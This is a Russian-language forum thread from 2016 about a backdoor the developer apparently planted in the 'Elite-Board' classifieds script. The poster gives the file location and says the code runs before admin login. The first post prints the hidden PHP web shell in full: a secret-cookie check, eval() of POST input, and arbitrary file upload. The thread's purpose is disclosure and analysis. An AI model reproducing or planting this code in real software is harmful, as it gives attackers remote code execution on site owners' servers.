PDA

Просмотр полной версии : Elite-Board - встренный бэкдор (безнадёжная ситуация)


Disasm
12.10.2016, 03:48
Друзья, всех приветствую! Стараюсь по пустякам не обращаться за помощью, но ситуация складывается абсолютно безнадёжная.

Существует старый, как говно мамонта, скрипт доски объявлений - "Elite-Board", разработчик: http://illusionweb.org/

В данный скрипт разработчик внедрил бэкдор, подробнее: http://searchengines.guru/showthread.php?t=770644

Код бэкдора:


if(isset($_COOKIE['megasecret']))
{
if($_COOKIE['megasecret'] =='удалено на всякий случ й')
{
echo'








stripslashes



';
if($_POST['mega-exe'] !='')
{
if($_POST['mega-str'] !='')
{
$_POST['mega-exe'] =stripslashes($_POST['mega-exe']);
}
eval($_POST['mega-exe']);
}
echo'';
if(file_exists($_FILES['mega-file']['tmp_name']))
{
move_uploaded_file($_FILES['mega-file']['tmp_name'],$_POST['mega-path'].$_FILES['mega-file']['name']);
}
exit();
}
}

Бэкдор покоится в файле includes/optimizer/admin/funct.php, инклудится при входе в админку (до авторизации, т.е. авторизация не требуется). Бэкдор по стандарту завёрнут в eval(base64_decode()). Сам файл (funct.php) зашифрован зендом.

Бэкдор присутствует в версиях Elite-Board 2.0

Disasm
23.10.2016, 19:56
Тут все трупы что ли? Неужели ни у кого нет соображений, как же всё-таки раздобыть сурс этой доски? Пошуршите на винтах, может у кого валяется.

Дурдом. Есть бэкдор, но в этих ваших интернетах, где никогда ничего не пропадает, невозможно найти исходник скрипта.

Disasm
23.10.2016, 19:59
Загуглился уже до того, что даже откопал часть исходника, который кто-то когда-то прогонял через онлайн-сервис декодирования base64: http://www.unphp.net/decode/304e6ee05b39bbf2882e206bb10a71ad/